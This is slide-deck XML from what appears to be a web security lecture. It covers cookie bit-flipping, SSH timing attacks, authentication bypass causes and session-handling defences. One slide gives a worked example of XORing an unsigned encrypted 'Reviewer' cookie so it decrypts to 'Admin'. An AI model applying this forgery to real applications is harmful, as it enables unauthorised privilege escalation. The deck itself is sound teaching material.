              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> ciphertext</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>AuthCookieVal = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>encryptCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>"Role:Reviewer", "aiBuacoM8", "mee0epJee"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code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Bit-flip to Victory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1219" name="Google Shape;1219;p173"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1017725"/>
            <a:ext cx="85206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Cookie payload = "Role:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reviewer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>" provides the cookie value (hex) below</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>set-cookie: auth=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>de6dd89e66232da8a4dac92845</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">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u="sng"/>
              <a:t>Attacker:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" u="sng"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>By gathering cookies from various roles, looking for patterns and bit-flipping with XOR, a new valid cookie can be crafted without knowing the encryption key</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>de6dd89e66232da8a4dac92845</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>XOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>13011b000b</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Cookie: auth=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>de6dd89e66302cb3a4d1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Decrypts to “Role:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1220" name="Google Shape;1220;p173"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481700" y="1421725"/>
            <a:ext cx="1350600" cy="6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This isn’t signed!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1221" name="Google Shape;1221;p173"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1220" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6628500" y="1614025"/>
            <a:ext cx="853200" cy="148800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1222" name="Google Shape;1222;p173"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6628500" y="3550950"/>
            <a:ext cx="2066100" cy="6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Outcome used to set attacker’s cookie </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1223" name="Google Shape;1223;p173"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6176500" y="3368025"/>
            <a:ext cx="516300" cy="341100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1224" name="Google Shape;1224;p173"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5164900" y="3884525"/>
            <a:ext cx="1527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74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="6633000" cy="3580800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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SzPts val="1700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1" dirty="0"/>
              <a:t>Let your framework handle creating and signing sessions</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-323850" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" dirty="0"/>
              <a:t>Double check documentation to ensure it uses random session IDs</a:t>
            </a:r>
            <a:endParaRPr sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-323850" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" dirty="0"/>
              <a:t>Don’t store sensitive information in cookies. If you must, make sure the cookie is encrypted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1" i="1" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" dirty="0"/>
              <a:t> authenticated!</a:t>
            </a:r>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1" dirty="0"/>
              <a:t>Set appropriate flags on cookies</a:t>
            </a:r>
            <a:endParaRPr sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-323850" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" dirty="0"/>
              <a:t>Always use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1" dirty="0" err="1"/>
              <a:t>httpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1" dirty="0"/>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" dirty="0"/>
              <a:t> flags, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1" dirty="0" err="1"/>
              <a:t>sameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500" dirty="0"/>
              <a:t>where possible</a:t>
            </a:r>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1" dirty="0"/>
              <a:t>Destroy sessions when users log out</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-323850" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" dirty="0"/>
              <a:t>Use framework methods to ensure sessions </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500" dirty="0"/>
              <a:t>are destroyed properly</a:t>
            </a:r>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1230" name="Google Shape;1230;p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pic>
        <p:nvPicPr>
          <p:cNvPr id="1231" name="Google Shape;1231;p174"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7044100" y="1098999"/>
            <a:ext cx="2413625" cy="2416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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1236" name="Google Shape;1236;p175"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973375" y="2749150"/>
            <a:ext cx="2109300" cy="8700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1237" name="Google Shape;1237;p175"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-423419">
            <a:off x="5973010" y="1694429"/>
            <a:ext cx="2256293" cy="10891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FFFF"/>
                </a:solidFill>
                <a:latin typeface="Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t>Hacks</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Permanent Marker"/>
              <a:ea typeface="Permanent Marker"/>
              <a:cs typeface="Permanent Marker"/>
              <a:sym typeface="Permanent Mark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76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8520600" cy="3718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In 2001, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Dug Song</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> discovered two timing attacks against the SSH protocol</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>First:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> SSHv1 sent the plaintext length in the clear. This revealed the exact length of passwords, reducing the keyspace for a brute force attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Second:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> During interactive sessions, an SSH server would echo each character back to the client.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>When passwords are being entered, however, the echo is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>disabled</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dug wrote a sniffer to detect the lack of echo, and count subsequent packets, revealing the length of the user’s password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Timing between individual packets also leaked information about how hard it was to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>enter the next key in the password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243" name="Google Shape;1243;p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Timing Attack</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177"/>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Authentication Bypass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178"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295400" y="582175"/>
            <a:ext cx="5620800" cy="8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Authentication Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Proving Your Identity</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1254" name="Google Shape;1254;p178"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295400" y="1965625"/>
            <a:ext cx="5289600" cy="22866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b="1"/>
              <a:t>Client: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hello. I am Mark. Please let me in.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Server:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Prove it, “Mark”.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Client:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> &lt;presents some form of proof&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Server:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Ok, come on in.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is it Bypassed?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1260" name="Google Shape;1260;p179"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="79917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t>Authentication bypasses may result from:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Faulty/missing authentication logic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Simple oversight (e.g. forgetting to annotate a function/route)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Guessable credentials (e.g. common passwords, defaults)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
